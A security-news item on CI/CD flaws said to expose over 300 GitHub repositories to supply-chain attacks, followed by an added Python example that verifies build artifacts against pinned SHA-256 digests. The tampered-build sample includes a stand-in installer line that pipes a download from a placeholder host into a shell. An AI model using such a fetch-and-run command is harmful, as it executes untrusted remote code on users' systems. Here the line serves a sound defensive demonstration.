Cordyceps CI/CD Flaws Expose 300+ GitHub Repositories to Supply-Chain Attacks
Security researchers have identified vulnerabilities in Cordyceps CI/CD systems that expose more than 300 GitHub repositories to supply-chain attacks. The flaws could let an attacker inject malicious code into the build process, so that the artifacts a pipeline produces no longer correspond to the source the maintainers reviewed. Attacks of this kind are particularly dangerous because a single compromised build reaches every downstream user who downloads or depends on the resulting software. The affected repositories span a range of projects, though specific names were not disclosed. The researchers reported the issues to the maintainers, but no patches have been released yet. Until fixes are available, developers using Cordyceps CI/CD are advised to review their pipeline configurations and monitor their builds for unusual activity. The discovery highlights an ongoing risk in the software supply chain: a vulnerability in a CI/CD pipeline is inherited by every artifact that pipeline produces, however careful the upstream code review was.
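One check that addresses exactly this failure mode on the consuming side, given here as an added example that is not code from the article, from Cordyceps CI/CD, or from any of the affected projects: a downstream consumer verifies every artifact it is about to install against a SHA-256 manifest pinned out of band, so a build whose output was altered inside the pipeline is rejected instead of deployed. The manifest layout (the two-column `sha256sum` format), the file names and the artifact bytes are assumptions constructed for the example.

```python
"""Verify build artifacts against pinned SHA-256 digests.

Added example; not code from the article or from Cordyceps CI/CD.
Assumptions: the consumer keeps a manifest in `sha256sum` format
("<hex digest>  <filename>") obtained over a path it trusts, e.g.
committed to its own repository after a verified release, rather than
fetched from the same pipeline that produced the artifacts. All
artifact bytes below are constructed stand-ins, not real binaries.
"""
import hashlib
import hmac


def sha256_hex(data: bytes) -> str:
    """Hex SHA-256 of an in-memory artifact."""
    return hashlib.sha256(data).hexdigest()


def parse_manifest(text: str) -> dict:
    """Parse `sha256sum`-style lines into {filename: lowercase hex digest}.

    Rejects malformed lines instead of skipping them: a manifest that an
    attacker could quietly truncate or corrupt must fail closed.
    """
    expected = {}
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.split(None, 1)
        if len(parts) != 2:
            raise ValueError(f"manifest line {lineno}: expected '<digest>  <file>'")
        digest, name = parts[0].lower(), parts[1].lstrip("*")  # '*' = sha256sum binary mode
        if len(digest) != 64 or any(c not in "0123456789abcdef" for c in digest):
            raise ValueError(f"manifest line {lineno}: malformed SHA-256 digest")
        expected[name] = digest
    return expected


def verify_artifacts(manifest: str, artifacts: dict) -> dict:
    """Return {filename: status}.

    'ok'       digest matches the pinned value
    'mismatch' artifact bytes differ from what was pinned (tampered or rebuilt)
    'unlisted' pipeline emitted a file nobody pinned (e.g. an injected script)
    'missing'  manifest lists a file the pipeline did not deliver
    """
    expected = parse_manifest(manifest)
    results = {}
    for name, data in artifacts.items():
        if name not in expected:
            results[name] = "unlisted"
            continue
        # compare_digest avoids leaking how many leading bytes matched
        ok = hmac.compare_digest(sha256_hex(data), expected[name])
        results[name] = "ok" if ok else "mismatch"
    for name in expected:
        if name not in artifacts:
            results[name] = "missing"
    return results


def all_trusted(results: dict) -> bool:
    """True only if every delivered and every pinned artifact checks out."""
    return bool(results) and all(status == "ok" for status in results.values())


# Constructed sample: the release as built by a trusted run, and the
# manifest the consumer pinned from that run.
GOOD_RELEASE = {
    "tool-1.4.2-linux-amd64": b"\x7fELF<stand-in for a real binary>",
    "tool-1.4.2.tar.gz": b"\x1f\x8b<stand-in for a real tarball>",
}
PINNED_MANIFEST = "\n".join(
    f"{sha256_hex(data)}  {name}" for name, data in GOOD_RELEASE.items()
)

# Constructed tampered build: the binary gained an appended payload and the
# pipeline emitted an extra installer script that was never pinned.
TAMPERED_RELEASE = dict(GOOD_RELEASE)
TAMPERED_RELEASE["tool-1.4.2-linux-amd64"] += b"<injected payload>"
TAMPERED_RELEASE["install.sh"] = b"curl https://example.invalid/x | sh"


if __name__ == "__main__":
    for label, release in (("good", GOOD_RELEASE), ("tampered", TAMPERED_RELEASE)):
        results = verify_artifacts(PINNED_MANIFEST, release)
        print(label, "trusted" if all_trusted(results) else "REJECTED", results)
```

The value of the check depends entirely on where the digests came from: a manifest generated by the same compromised pipeline would simply match its own poisoned output. The pinned digests need to reach the consumer through a path the attacker does not control, such as a reproduced build or a release record the maintainers sign and publish separately, and an `unlisted` result deserves the same scrutiny as a `mismatch`, since a new file appearing in a release is one of the plainest signs that something other than the reviewed source shaped the build.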
CI/CD flaws can lead to widespread supply-chain compromise, affecting all users of compromised software.